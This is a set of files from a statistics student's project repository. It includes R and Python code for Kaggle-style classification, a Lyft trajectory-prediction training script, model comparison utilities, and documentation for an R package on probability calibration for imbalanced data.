"num_lines": 9, "path": "/Kaggle_Travelers/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# Kaggle: Travelers Claim Fraud Detection\n\nThis is a in-class project for STAT 8051 (Advanced Regression Techniques I). \n\nThe competition website is https://www.kaggle.com/c/2018-trv-statistical-modeling-competition-umn. The goal of this project is to build a predictive model based on historical claim data and provide explanations for the predicted fraudulent claims.\n\nTeam Members: Somyi Baek, Sam Piehl, King Yiu Suen, Xun Xian, Yu Yang.\n\nWe ranked 2nd out 8 teams." }, { "alpha_fraction": 0.544089674949646, "alphanum_fraction": 0.5950518250465393, "avg_line_length": 23.25128173828125, "blob_id": "4a516ab980996b45696657543f25d54e8ab01823", "content_id": "9e5ae34f7402a357d9dfc886854daf5bccfcdf58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 4729, "license_type": "no_license", "max_line_length": 77, "num_lines": 195, "path": "/wellsfargo/Rcode/eda.R", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "## ======= Update at July 25 ========== Yu ##\n\nsetwd(dirname(rstudioapi::getActiveDocumentContext()$path))\ntrain <- read.csv(\"../data/train.csv\")\ntest <- read.csv(\"../data/test.csv\")\nlibrary(dplyr)\n\n## make naive predictions on the train set\ntrain <- within(train, {\n XC <- as.numeric(XC) - 3\n Xg <- X2 + X3 + X4 + X6 + X7 + X11 + X15 + X17 + X19 + X20 + \n X21 + X22 + X25 + X26 + X27 + XC + 2\n})\n\nplot(y ~ Xg, train)\nabline(v=0)\n\n# check error rate\ntrain.pred <- as.numeric(train$Xg < 0)\n(err.rate <- mean(train.pred != train$y)) \n\n# check 1 vs 0 ratio in train$y\nmean(train$y)\n\n## check the margin of the classifier\n# upper part\n(upper <- train %>% \n filter(Xg > 0) %>% \n select(Xg) %>% \n summarise(upper.margin=min(Xg), upper.count=n()))\n# lower part\n(lower <- train %>% \n filter(Xg < 0) %>% \n select(Xg) %>% \n summarise(lower.margin=max(Xg), lower.count=n()))\n\n# make naive predictions on the test set\ntest <- within(test, {\n XC <- as.numeric(XC) - 3\n Xg <- X2 + X3 + X4 + X6 + X7 + X11 + X15 + X17 + X19 + X20 + \n X21 + X22 + X25 + X26 + X27 + XC + 2\n})\n\ntest.pred <- as.numeric(test$Xg < 0)\n\n# check 1 vs 0 raio in test.pred\nmean(test.pred)\n\n# check how many Xg in test would fall in the margin\ntest %>% \n select(Xg) %>%\n filter(Xg >= lower$lower.margin, Xg <= upper$upper.margin)\n \n\n## ======= Update at July 20 ========== Yu ##\nsetwd(dirname(rstudioapi::getActiveDocumentContext()$path))\ntrain <- read.csv(\"../data/train.csv\")\ntest <- read.csv(\"../data/test.csv\")\n\n# compare the density curves between train and test\npar(mfrow = c(2, 3))\nfor (i in 1:30) {\n plot(density(train[, i]), col = 'blue', lwd=2, \n main = paste(\"density curve for \", names(train)[i]))\n lines(density(test[, i]), col = 'red', lwd=2)\n legend(\"topright\", legend = c(\"train\", \"test\"), \n col = c(\"blue\", \"red\"), lwd = c(2, 2), cex=0.7)\n}\npar(mfrow = c(1, 1))\n\n# do Kolmogorov-Smirnov test between train and test\nfor (i in 1:30) {\n result <- ks.test(train[, i], test[, i])\n if (result$p.value < 0.1) {\n print(paste(\"i = \", i, sep = \"\"))\n print(result)\n }\n}\n\n# do Mann-Whitney U test between train and test\nfor (i in 1:30) {\n result <- wilcox.test(train[, i], test[, i])\n if (result$p.value < 0.1) {\n print(paste(\"i = \", i, sep = \"\"))\n print(result)\n }\n}\n\n\n## ============================================= ##\n\ndat <- read.csv(\"../data/train.csv\")\n\n### boxplot x~y\n## some are significant\nfor (i in 1:30) {\n boxplot(dat[,i] ~ dat[,32])\n}\n\n### imbalance label\ntable(dat[,32])\n\n############## explore categorical variable\ndat2 = read.csv(\"../data/test.csv\")\ntable(c(dat[,31],dat2[,31]))\nmax(table(c(dat[,31],dat2[,31]))) - min(table(c(dat[,31],dat2[,31])))\n## it seems like a uniform distribution on {A,B,C,D,E}\n## simulation\n{\n see = sample(1:5, 10000, T)\n table(see)\n max(table(see)) - min(table(see))\n}\n#### plot categorical variable with y\ncat0 = dat[dat$y == 0,]\ncat1 = dat[dat$y == 1,]\ntable(cat0[,31])\ntable(cat1[,31])\nbarplot(table(cat0[,31]))\nbarplot(table(cat1[,31]))\n## more CDE in class 0, more ABC in class1\n## think about how they generated abels using this categorical variable\n\n############# explore numeric variables\n### looks like normal and no correlations\nlibrary(nortest)\n### class 0\nfor (i in 1:30) {\n qqnorm(cat0[,i])\n qqline(cat0[,i])\n print(ad.test(cat0[,i]))\n}\n### class 1\nfor (i in 1:30) {\n qqnorm(cat1[,i])\n qqline(cat1[,i])\n print(ad.test(cat1[,i]))\n}\n### all training\nfor (i in 1:30) {\n qqnorm(dat[,i])\n qqline(dat[,i])\n print(ad.test(dat[,i]))\n}\n\n## compare with true normal\nfor (i in 1:30) {\n x = rnorm(3000)\n print(ad.test(x))\n qqnorm(x)\n qqline(x)\n}\n\n### cor\ncor(dat[,1:30])\n\n################# fit some model\nset.seed(1)\n### one hot encoder\nnewdat = dat[,1:30]\nnewdat[,31:35] = diag(rep(1,5))[as.numeric(dat[,31]),]\nnewdat[,36] = dat[,32]\n\n########## logistic + lasso\nlibrary(glmnet)\nmod = cv.glmnet(as.matrix(newdat[,1:35]), newdat[,36], family = \"binomial\",\n type.measure=\"class\")\nmod$lambda\nmod$cvm #### best error rate is 0.005000, smaller lambda gives better result\n\nmod2 = cv.glmnet(as.matrix(newdat[,1:30]), newdat[,36], family = \"binomial\",\n type.measure=\"class\")\nmod2$lambda\nmod2$cvm #### best error rate is 0.005000, smaller lambda gives better result\n\n\n## coefficients\nView(as.matrix(mod$glmnet.fit$beta)[,100])\n## it seems the coefficients are -2,-1,0,1,2\n\n\nlibrary(mda)\n########### MDA\ntrain_index = sample(1:3000, 2700)\ntrain = newdat[train_index,]\ntest = newdat[-train_index,]\n\n?mda\nmdamod = mda(V36~., data = train[,-(31:35)])\nmdamod = mda(y~., data = dat[,-(31)])\nmda_pred = predict(mdamod,test[,-(31:35)])\nloss = function(y, y_p){\n mean(y != y_p)\n}\nloss(mda_pred, test[,36]) ### error rate is about 0.1\n" }, { "alpha_fraction": 0.5866232514381409, "alphanum_fraction": 0.6037379503250122, "avg_line_length": 33.89011001586914, "blob_id": "74974527a4a7189d2d5afaac217a5571c96db2ef", "content_id": "80cb4f54e96d8142750de0807b5aa6c13e67ba56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9524, "license_type": "no_license", "max_line_length": 140, "num_lines": 273, "path": "/lyft/train.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "from typing import Dict\n\nfrom tempfile import gettempdir\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport torch\nfrom torch import nn, optim\nfrom torch.utils.data import DataLoader\nfrom torchvision.models.resnet import resnet50, resnet18, resnet34, resnet101\nfrom efficientnet_pytorch import EfficientNet\nfrom tqdm import tqdm\n\nimport l5kit\nfrom l5kit.configs import load_config_data\nfrom l5kit.data import LocalDataManager, ChunkedDataset\nfrom l5kit.dataset import AgentDataset, EgoDataset\nfrom l5kit.rasterization import build_rasterizer\nfrom l5kit.evaluation import write_pred_csv, compute_metrics_csv, read_gt_csv, create_chopped_dataset\nfrom l5kit.evaluation.chop_dataset import MIN_FUTURE_STEPS\nfrom l5kit.evaluation.metrics import neg_multi_log_likelihood, time_displace, average_displacement_error_mean, final_displacement_error_mean\nfrom l5kit.geometry import transform_points\nfrom l5kit.visualization import PREDICTED_POINTS_COLOR, TARGET_POINTS_COLOR, draw_trajectory\nfrom prettytable import PrettyTable\nfrom pathlib import Path\n\nimport matplotlib.pyplot as plt\n\nimport os\nimport random\nimport time\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nfrom tensorboardX import SummaryWriter\nfrom json import dumps\nfrom adamp import AdamP\n\nimport utils\nfrom models import LyftEffnet\nfrom utils import forward\n\n### =============== Configurations ============= ###\ncfg = {\n 'format_version': 4,\n 'data_path': \"input/lyft-motion-prediction-autonomous-vehicles\",\n 'save_dir': \"./save/\",\n 'name': 'effnetb4_300',\n 'gpu_ids': [4, 5, 6, 7],\n 'seed': 2, \n 'load_path': \"\", \n 'model_params': {\n # 'model_architecture': 'resnet50',\n 'history_num_frames': 10,\n 'history_step_size': 1,\n 'history_delta_time': 0.1,\n 'future_num_frames': 50,\n 'future_step_size': 1,\n 'future_delta_time': 0.1,\n 'model_name': \"effnetb4_300\",\n 'lr': 1e-4,\n 'train': True,\n 'predict': False,\n },\n\n 'raster_params': {\n 'raster_size': [300, 300],\n 'pixel_size': [0.5, 0.5],\n 'ego_center': [0.25, 0.5],\n 'map_type': 'py_semantic',\n 'satellite_map_key': 'aerial_map/aerial_map.png',\n 'semantic_map_key': 'semantic_map/semantic_map.pb',\n 'dataset_meta_key': 'meta.json',\n 'filter_agents_threshold': 0.5\n },\n\n 'train_data_loader': {\n 'key': 'scenes/train.zarr',\n 'batch_size': 64, # 16\n 'shuffle': True,\n 'num_workers': 16 # 4\n },\n \n 'val_data_loader': {\n 'dir': 'input/lyft-motion-prediction-autonomous-vehicles/scenes/validate_chopped_100',\n 'key': 'scenes/validate_chopped_100/validate.zarr',\n 'batch_size': 64,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'test_data_loader': {\n 'key': 'scenes/test.zarr',\n 'batch_size': 32,\n 'shuffle': False,\n 'num_workers': 16 # 4\n },\n\n 'train_params': {\n 'max_num_steps': 12000000,\n 'eval_steps': 160000,\n 'max_grad_norm': 5.0,\n }\n}\n\ndef main(cfg):\n\n # set logger, tensorboard, and devices\n cfg['save_dir'] = utils.get_save_dir(cfg['save_dir'], cfg['name'], training=True)\n log = utils.get_logger(cfg[\"save_dir\"], cfg[\"name\"])\n tbx = SummaryWriter(cfg[\"save_dir\"])\n device = utils.get_devices(cfg[\"gpu_ids\"])\n cfg[\"train_data_loader\"][\"batch_size\"] *= max(1, len(cfg[\"gpu_ids\"]))\n cfg[\"val_data_loader\"][\"batch_size\"] *= max(1, len(cfg[\"gpu_ids\"]))\n\n log.info(f\"Cfg: {dumps(cfg, indent = 4, sort_keys = True)}\")\n\n\n # get model\n log.info(\"Building model...\")\n model = LyftEffnet(cfg)\n model = nn.DataParallel(model, device_ids=cfg[\"gpu_ids\"])\n if cfg[\"load_path\"]:\n # reset the seed to sample some other data\n cfg[\"seed\"] *= 2\n log.info(f\"Loading checkpoint from {cfg['load_path']}...\")\n model, step = utils.load_model(model, cfg[\"load_path\"], cfg[\"gpu_ids\"])\n else:\n step = 0\n model = model.to(device)\n model.train()\n\n\n # set random seed\n log.info(f\"Using random seed {cfg['seed']}\")\n utils.set_seed(cfg[\"seed\"])\n\n # get saver\n saver = utils.CheckpointSaver(cfg[\"save_dir\"], log = log)\n\n # get optimizer\n optimizer = optim.Adam(model.parameters(), lr=cfg[\"model_params\"][\"lr\"])\n # optimizer = AdamP(model.parameters(), lr = 1e-4, weight_decay=1e-2)\n # optimizer = optim.SGD(model.parameters(), lr = 1e-4, momentum=0.9)\n # optimizer = optim.SGD(model.parameters(), lr = 5e-5, momentum=0.9)\n # optimizer = optim.SGD(model.parameters(), lr = 1e-5, momentum=0.9)\n\n # get dataloader\n DIR_INPUT = cfg[\"data_path\"]\n os.environ[\"L5KIT_DATA_FOLDER\"] = DIR_INPUT\n dm = LocalDataManager(None)\n\n log.info(\"Building training dataset...\")\n train_cfg = cfg[\"train_data_loader\"]\n rasterizer = build_rasterizer(cfg, dm)\n train_zarr = ChunkedDataset(dm.require(train_cfg[\"key\"])).open()\n train_dataset = AgentDataset(cfg, train_zarr, rasterizer)\n train_dataloader = DataLoader(train_dataset, shuffle=train_cfg[\"shuffle\"], batch_size=train_cfg[\"batch_size\"], \n num_workers=train_cfg[\"num_workers\"], pin_memory=True)\n log.info(str(train_dataset))\n\n log.info(\"Building validation dataset...\")\n val_cfg = cfg[\"val_data_loader\"]\n val_zarr = ChunkedDataset(dm.require(val_cfg[\"key\"])).open()\n val_mask = np.load(f\"{val_cfg['dir']}/mask.npz\")[\"arr_0\"]\n val_dataset = AgentDataset(cfg, val_zarr, rasterizer, agents_mask=val_mask)\n val_dataloader = DataLoader(val_dataset, shuffle=val_cfg[\"shuffle\"], batch_size=val_cfg[\"batch_size\"],\n num_workers=val_cfg[\"num_workers\"], pin_memory=True)\n log.info(str(val_dataset))\n\n\n # Train\n log.info(\"Training...\")\n tr_it = iter(train_dataloader)\n max_steps = cfg[\"train_params\"][\"max_num_steps\"]\n losses_train = []\n steps_till_eval = cfg[\"train_params\"]['eval_steps']\n with torch.enable_grad(), tqdm(total=max_steps) as progress_bar:\n while step < max_steps:\n try:\n data = next(tr_it)\n except StopIteration:\n tr_it = iter(train_dataloader)\n data = next(tr_it)\n \n # forward pass\n loss, _, _, batch_size = forward(data, model, device)\n\n # Backward pass\n optimizer.zero_grad()\n loss.backward()\n nn.utils.clip_grad_norm_(model.parameters(), cfg['train_params']['max_grad_norm'])\n optimizer.step()\n\n losses_train.append(loss.item())\n\n # log info\n step += batch_size\n progress_bar.update(batch_size)\n progress_bar.set_description(f\"loss: {loss.item()} loss(avg): {np.mean(losses_train)}\")\n tbx.add_scalar('train/loss', loss, step)\n\n steps_till_eval -= batch_size\n if steps_till_eval <= 0:\n steps_till_eval = cfg[\"train_params\"][\"eval_steps\"]\n\n # Evaluate and save checkpoint\n log.info(f\"Evaluate at step {step}...\")\n metrics = evaluate(model, val_dataloader, device)\n saver.save(step, model, metrics['neg_multi_log_likelihood'], device)\n\n # Log to console\n metrics_str = ', '.join(f\"{k}: {v:05.2f}\" for k, v in metrics.items())\n log.info(f\"Validate {metrics_str}\")\n\n # Log to tensorboard\n log.info(\"Visualizing in Tensorboard...\")\n for k, v in metrics.items():\n tbx.add_scalar(f\"val/{k}\", v, step)\n\n\ndef evaluate(model, data_loader, device):\n model.eval()\n # store information for evaluation\n future_coords_offsets_pd = []\n timestamps = []\n confidences_list = []\n agent_ids = []\n\n progress_bar = tqdm(data_loader)\n\n with torch.no_grad():\n for data in progress_bar:\n\n _, preds, confidences, _ = forward(data, model, device)\n\n #fix for the new environment\n preds = preds.cpu().numpy()\n world_from_agents = data[\"world_from_agent\"].numpy()\n centroids = data[\"centroid\"].numpy()\n \n # convert into world coordinates and compute offsets\n for idx in range(len(preds)):\n for mode in range(3):\n preds[idx, mode, :, :] = transform_points(preds[idx, mode, :, :], world_from_agents[idx]) - centroids[idx][:2]\n \n future_coords_offsets_pd.append(preds.copy())\n confidences_list.append(confidences.cpu().numpy().copy()) \n timestamps.append(data[\"timestamp\"].numpy().copy()) \n agent_ids.append(data[\"track_id\"].numpy().copy())\n \n model.train()\n\n pred_path = os.path.join(cfg['save_dir'], \"pred.csv\")\n\n write_pred_csv(pred_path, \n timestamps=np.concatenate(timestamps), \n track_ids=np.concatenate(agent_ids), \n coords=np.concatenate(future_coords_offsets_pd),\n confs = np.concatenate(confidences_list)\n )\n val_gt_path = f\"{cfg['val_data_loader']['dir']}/gt.csv\"\n # metrics reference: https://github.com/lyft/l5kit/blob/380097ebd1937835d1c13ff5ec831610d42b6f73/l5kit/l5kit/evaluation/metrics.py\n metrics = compute_metrics_csv(val_gt_path, pred_path, \n [neg_multi_log_likelihood, average_displacement_error_mean, \n final_displacement_error_mean])\n \n return metrics\n\nif __name__ == '__main__':\n main(cfg)" }, { "alpha_fraction": 0.6337346434593201, "alphanum_fraction": 0.6360953450202942, "avg_line_length": 33.434959411621094, "blob_id": "fefed4882755dc0249c63c120807b22ff86ef3d9", "content_id": "89d6c08840b4e050c7a7646ada803ad163b207c2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8472, "license_type": "no_license", "max_line_length": 112, "num_lines": 246, "path": "/wellsfargo/solution/code/models.py", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\n\nfrom sklearn.model_selection import cross_val_score, cross_validate\nfrom sklearn.model_selection import RepeatedStratifiedKFold, KFold\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import LabelEncoder\nfrom lightgbm import LGBMClassifier\nfrom xgboost import XGBClassifier\nfrom catboost import CatBoostClassifier\n\n\ndef encode(data, method=\"ordinal\"):\n \"\"\"Encode categorical columns in the dataset.\n\n Parameters\n ----------\n data: dataframe\n The dataset to be encoded.\n\n method: str, {'onehot', 'ordinal'}, default='ordinal'\n The encoding method.\n\n Returns\n -------\n data:\n The encoded dataset.\n \"\"\"\n assert method in (['ordinal', 'onehot'])\n if method == 'onehot':\n var_dummies = pd.get_dummies(data['XC'], prefix = 'X')\n data = pd.concat([data, var_dummies], axis=1)\n data.drop(columns=['XC'], inplace=True)\n if method == 'ordinal':\n data['XC'] = pd.factorize(data['XC'], sort=True)[0]\n \n return data\n\n\ndef model_init(model_type, **params):\n \"\"\" Initialize a model according to the model name.\n\n Parameters\n ----------\n model_type: {'LR', 'LDA', 'KNN', 'CART', 'NB', 'SVM', 'LGBM', \\\n 'XGBoost', 'CatBoost'}\n The type of the model to initialize.\n\n params: dictionary\n A dictionary of parameters for the specified model.\n\n Returns\n -------\n model:\n An initialized model.\n \"\"\"\n\n model_candidates = ['LR', 'LDA', 'KNN', 'CART', 'NB', 'SVM', 'LGBM', \\\n 'XGBoost', 'CatBoost']\n if model_type not in model_candidates:\n raise ValueError(f\"Model should be one of {model_candidates}.\\n\")\n\n if model_type == 'LR':\n model = LogisticRegression(**params)\n elif model_type == 'LDA':\n model = LinearDiscriminantAnalysis(**params)\n elif model_type == 'KNN': \n model = KNeighborsClassifier(**params)\n elif model_type == 'CART': \n model = DecisionTreeClassifier(**params)\n elif model_type == 'NB': \n model = GaussianNB(**params)\n elif model_type == 'SVM':\n model = LinearSVC(**params)\n elif model_type == 'LGBM':\n model = LGBMClassifier(**params)\n elif model_type == 'XGBoost':\n model = XGBClassifier(**params)\n elif model_type == 'CatBoost':\n model = CatBoostClassifier(**params)\n \n return model\n\n\ndef model_eval(X, y, model_type, scoring, seed, **params):\n \"\"\" Evaluate a single model using cross-validation.\n\n The cross validation used here is RepeatedStratifiedKFold. Refer to \\\n https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.RepeatedStratifiedKFold.html \\\n for more details.\n\n Parameters\n ----------\n X: ndarray of shape (n, dx)\n The predicting feature matrix.\n \n y: ndarray of shape (n, )\n The response.\n\n model_type: {'LR', 'LDA', 'KNN', 'CART', 'NB', 'SVM', 'LGBM', \\\n 'XGBoost', 'CatBoost'}\n The type of the model to evaluate.\n \n scoring: {'accuracy', 'f1', 'f1_weighted', 'precision', 'recall', \\\n 'roc_auc', 'neg_log_loss', 'neg_brier_score'}\n The scoring metric to evaluate in cv.\n \n seed: int\n The seed to assure the same cross validation fold splitting.\n \n params: dictionary\n The parameter specification for the model.\n\n Returns\n -------\n No returns. Print out the mean and stanndard error of the cv results.\n\n References\n ----------\n https://scikit-learn.org/stable/modules/model_evaluation.html\n \"\"\"\n model = model_init(model_type, **params)\n cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=5, random_state=seed)\n cv_results = cross_val_score(model, X, y, cv=cv, scoring=scoring)\n msg = \"%s: %f (%f)\" % (model_type, cv_results.mean(), cv_results.std())\n print(msg)\n\n\ndef model_compare(X, y, model_types, model_params, model_names, scoring, \\\n image_dir='../images', display=True, seed=99):\n \"\"\" Compare multiple models in terms of scoring, using cross validation.\n \n The cross validation used here is RepeatedStratifiedKFold. \n \n Parameters\n ----------\n X: ndarray of shape (n, dx)\n The predicting feature matrix.\n \n y: ndarray of shape (n, )\n The response.\n \n model_types: list of str\n A list of model types. Refer to model_init() to see candidate models.\n \n model_params: list of dictionary\n A list of model parameters, and model parameters are specified by dictionaries.\n Should be of the same length as model_types.\n\n model_names: list of str\n A list of model names, corresponding to the models in model_types.\n Should be of the same length as model_types and model_params.\n\n scoring: a dictionary of multiple scoring metrics.\n Example: scoring = {'auc': 'roc_auc', 'accuracy': 'accuracy'}\n The scoring metrics to evaluate in cv.\n \n image_dir: a str\n The path to save the generated images.\n\n display: bool\n Whether or not to display the figures.\n\n seed: int\n The seed to assure the same cross validation fold splitting.\n \n Returns\n -------\n results: a list of dictionary\n Each element is a dictionary containing the cross validation results.\n \n compare_df: a dataframe\n Columns represent the metrics and indices correspond to model names.\n Each entry is a string containing the mean and standard deviation of the cv results.\n \n compare_plot_df: a dataframe\n Columns represent model names and indices are the metrics.\n Each entry is the mean of the corresponding cv results.\n This dataframe is used for generating comparison plots.\n\n A model comparison diagram of model comparison would be displayed and saved to \\\n the image folder.\n With respect to each scoring metric, one boxplot comparison diagram would be \\\n displayed and saved to the image folder.\n \"\"\"\n if not os.path.exists(image_dir):\n os.makedirs(image_dir)\n \n results = []\n compare_df = pd.DataFrame(columns = list(scoring.keys()), \\\n index = model_names)\n # create compare_plot_df for plotting\n compare_plot_df = pd.DataFrame(columns = model_names, \\\n index = list(scoring.keys()))\n\n cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=5, random_state=seed)\n \n for model_type, params, model_name in zip(model_types, model_params, model_names):\n print(f\"Running {model_name}...\", end='\\t')\n model = model_init(model_type, **params)\n cv_results = cross_validate(model, X, y, cv=cv, scoring=scoring)\n results.append(cv_results)\n cv_metrics = [f\"{cv_results[key].mean(): .5f} ({cv_results[key].std(): .5f})\"\\\n for key in cv_results.keys() if key.startswith('test')]\n compare_df.loc[model_name] = cv_metrics\n\n compare_plot_df[model_name] = [cv_results[key].mean()\\\n for key in cv_results.keys() if key.startswith('test')]\n print(f\"{model_name} done!\")\n \n # plot the model comparison results using mean metrics\n plt.rcParams[\"figure.figsize\"] = (10,8)\n plt.figure()\n compare_plot_df.plot()\n plt.legend(loc='best')\n plt.savefig(f\"{image_dir}/model_compare.pdf\")\n print(f\"Model Comparison Diagram\")\n print(f\"It has been saved to '{image_dir}/model_compare.pdf'.\")\n if display:\n plt.show()\n else:\n plt.close()\n \n # plot boxplot comparison diagrams with respect to each metric\n for key in scoring.keys():\n fig = plt.figure()\n fig.suptitle(f'Model Comparison w.r.t. {key}')\n ax = fig.add_subplot(111)\n plt.boxplot([results[i][f\"test_{key}\"] for i in range(len(results))])\n ax.set_xticklabels(model_names)\n plt.savefig(f\"{image_dir}/model_compare_{key}.pdf\")\n print(f\"Boxplot for algorithm comparison in terms of {key}.\")\n print(f\"It has been saved to '{image_dir}/model_compare_{key}.pdf'.\")\n if display:\n plt.show()\n else:\n plt.close()\n \n return results, compare_df, compare_plot_df\n\n" }, { "alpha_fraction": 0.7527901530265808, "alphanum_fraction": 0.7868303656578064, "avg_line_length": 46.18421173095703, "blob_id": "6f5ca9b5b86ac146ad6e4d41c9c02d85b2e7d5a1", "content_id": "36cf30d5c72b32f6ae8013210bf835c98e0b5e40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1794, "license_type": "no_license", "max_line_length": 313, "num_lines": 38, "path": "/imbCalib/README.md", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "# R package: imbCalib\n\nThis is a class project for STAT 8054 (Statistical Methods IV).\n\nThis package intends to calibrate probabilities for imbalanced data. The method is to do bagging over undersampled datasets, and hence to mitigate the bias of probability calibration induced by the imbalance of the dataset. Refer to [Wallace et.al 2014](https://doi.org/10.1007/s10115-013-0670-6) for more detail.\n\n## Datasets\n`imbalance`: An imbalanced dataset with 8 covariates and 1 binary response. There are about 5% samples in the positive class.\n\n## Functions\n- `binProbs`: generate binned probabilities.\n- `brier`: calculate standard Brier score.\n- `stratifiedBrier`: calculate stratified Brier score.\n- `undersample`: generate an undersampled dataset.\n- `bagCalibrate`: perform bagged undersampled calibration\n - Support logistic regression, naive Bayes, random forest, and svm currently.\n- `calibCurve`: plot calibration curve.\n- `comparisonPlot`: plot calibration curves by several calibrated probabilities.\n\n## Vignettes\n\nCheck the link: [Vignette: Getting started with imbCalib](https://yuyangyy.com/assets/courses/files/vignette-imbcalib.html).\n\nOr, install the package and then\n```r\nbrowseVignettes(\"imbCalib\")\n```\n\n## References:\n\nWallace, B.C., Dahabreh, I.J. Improving class probability estimates for imbalanced data. Knowl Inf Syst 41, 33–52 (2014). https://doi.org/10.1007/s10115-013-0670-6\n\n## Helpful Resources to understand probability calibration\n[The Basics of Classifier Evaluation: Part 2](http://www.svds.com/classifiers2/)\n\n[How to Calibrate Probabilities for Imbalanced Classification](https://machinelearningmastery.com/probability-calibration-for-imbalanced-classification/)\n\n[Calibration of probabilities for tree-based models](https://gdmarmerola.github.io/probability-calibration/)" }, { "alpha_fraction": 0.6904016733169556, "alphanum_fraction": 0.7168710231781006, "avg_line_length": 53.9953498840332, "blob_id": "62d720007ce88e192bdc3977a3768807e3a8bdf7", "content_id": "f0d2dc5bade225e3c57d9a30d5592124a1aabcfc", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "RMarkdown", "length_bytes": 11831, "license_type": "no_license", "max_line_length": 696, "num_lines": 215, "path": "/imbCalib/package/imbCalib/vignettes/get-started.Rmd", "repo_name": "yuyangstatistics/projects", "src_encoding": "UTF-8", "text": "---\ntitle: \"Getting started with imbCalib\"\nauthor: \"Yu Yang\"\ndate: \"`r Sys.Date()`\"\noutput: rmarkdown::html_vignette\nvignette: >\n %\\VignetteIndexEntry{Getting started with imbCalib}\n %\\VignetteEngine{knitr::rmarkdown}\n %\\VignetteEncoding{UTF-8}\n---\n\n```{r setup, include = FALSE}\nknitr::opts_chunk$set(\n collapse = TRUE,\n comment = \">\",\n warning = FALSE, \n cache = TRUE\n)\nrequire('pacman')\npacman::p_load(pROC, mltools, caTools, e1071, randomForest, foreach, doParallel, abind, imbCalib)\n```\n\nWhen doing classification, we not only want the prediction results, but also the corresponding probabilty of the decision. The ideal probability shall give us a sense of confidence about the predicted labels. For example, given a sample, if the probability for the prediction is 80%, then approximately 80% samples with the same features actually have the predicted label. For applications where we need to use confidence to support decision making, it is vital to have good estimates of probabilities.\n\nBut unlike logistic regression, where the prediction is based on probabilities, many supervised learning methods don't come natually with probabilities. For example, Support Vector Machine is performed based on margins, instead of probabilities. The probabilities given by SVM model is actually calibrated using Platt's scaling. Another commonly used calibration method is Isotonic regression. Check [Niculescu-Mizil and Caruana 2005](https://www.cs.cornell.edu/~alexn/papers/calibration.icml05.crc.rev3.pdf) for more details.\n\nOne big issue of these methods is that they only work for balanced data, and when it comes to the imbalanced data case, they usually underestimate the probabilities for the minority class instances. To solve this problem, [Wallace and Dahabreh 2014](https://link.springer.com/article/10.1007%2Fs10115-013-0670-6) proposed using bagged undersampled method to calibrate probabilities. And this is the methodology basis of this package.\n\n## Imbalanced Dataset\nClass imbalance happens when the number of instances in each class is not equal. And in the imbalanced scenario, the rare events are usually misclassified. Imbalance would affect not only classfication results, but also probability calibration.\n\nA synthesized imbalanced dataset `imbalance` is provided in this package and it can be loaded with `data(imbalance)`. In this dataset, about 5% are in the positive class. There are 8 covariates and 1 binary response. The positive label is 1. \n\n```{r show-data}\ndata(imbalance)\nnames(imbalance)\nmean(imbalance$y)\n```\n\n## Metrics\n\n### Why AUC is not enough?\nIn the evaluation of model performances, accuracy is not enough for classification problems, and AUC can provide us more information. But AUC itself is not enough to evaluate the goodness of probability calibration. \n\nThe following example illustrates that the scale of the probabilities would not affect AUC. Two sets of probabilities can have the same AUC, while they show different levels of confidence. Therefore, AUC is not appropriate to evaluate the goodness of probability calibration.\n\n```{r example-auc, fig.height = 5, fig.width = 5}\n# simulate data\nthreshold <- 0.6\nset.seed(99)\ny.true <- (runif(10) > threshold) * 1\nset.seed(92)\ny.prob <- runif(10) \ny.pred <- (y.prob > threshold) * 1\n\n# print out the simulated data\ny.true\ny.prob\ny.pred\n\n# auc in the original scale\nauc(roc(y.true, y.prob, direction = \"<\", quiet = TRUE))\n\n# auc using the rank of the probabilities\nauc(roc(y.true, rank(y.prob), direction = \"<\", quiet = TRUE))\n\n# auc using the probability-like rank\nauc(roc(y.true, rank(y.prob) / 50, direction = \"<\", quiet = TRUE))\n\n# plot kernel density\nplot(density(y.prob), col = 'red', main = 'Kernel Density Curve', xlab = 'Probability Value', xlim = c(-0.5, 1.5), ylim = c(0, 5.5), lty = 1)\nlines(density(rank(y.prob) / 50), col = 'blue', lty = 1)\nlegend('topright', legend = c(\"Original Probability\", \"Rescaled Probability\"), \n col = c('red', 'blue'), lty = c(1, 1))\n```\n\n### Brier Score\n\nBrier score measures the fit of probability estimates to the observed data. It is defined as the mean squared difference between the observed labels and the estimated probability. A smaller value means a better calibration.\n$$BS = \\frac{\\sum_{i=1}^N (y_i - \\hat{P}(y_i | x_i))^2}{N}$$\n\nTo obtain the standard Brier score, run `brier` function. The first argument should be the true labels, and the second argument should be the calibrated probabilities.\n\n```{r brier}\ny.prob <- c(0.45454545, 0.36363636, 0.63636364, 0.18181818, 0.45454545, 0.09090909,\n 0.27272727, 0.81818182, 0.63636364, 0.63636364)\ny.true <- c(0, 0, 1, 1, 0, 1, 1, 0, 0, 0)\nbrier(y.true, y.prob)\n```\n\n### Stratified Brier Score\n\nStratified Brier Score was proposed by [Wallace and Dahabreh 2014](https://link.springer.com/article/10.1007%2Fs10115-013-0670-6) to evaluate the goodness of calibration under the imbalanced scenario. Unlike the standard Brier score, which only considers the overall matching, it takes care of both the 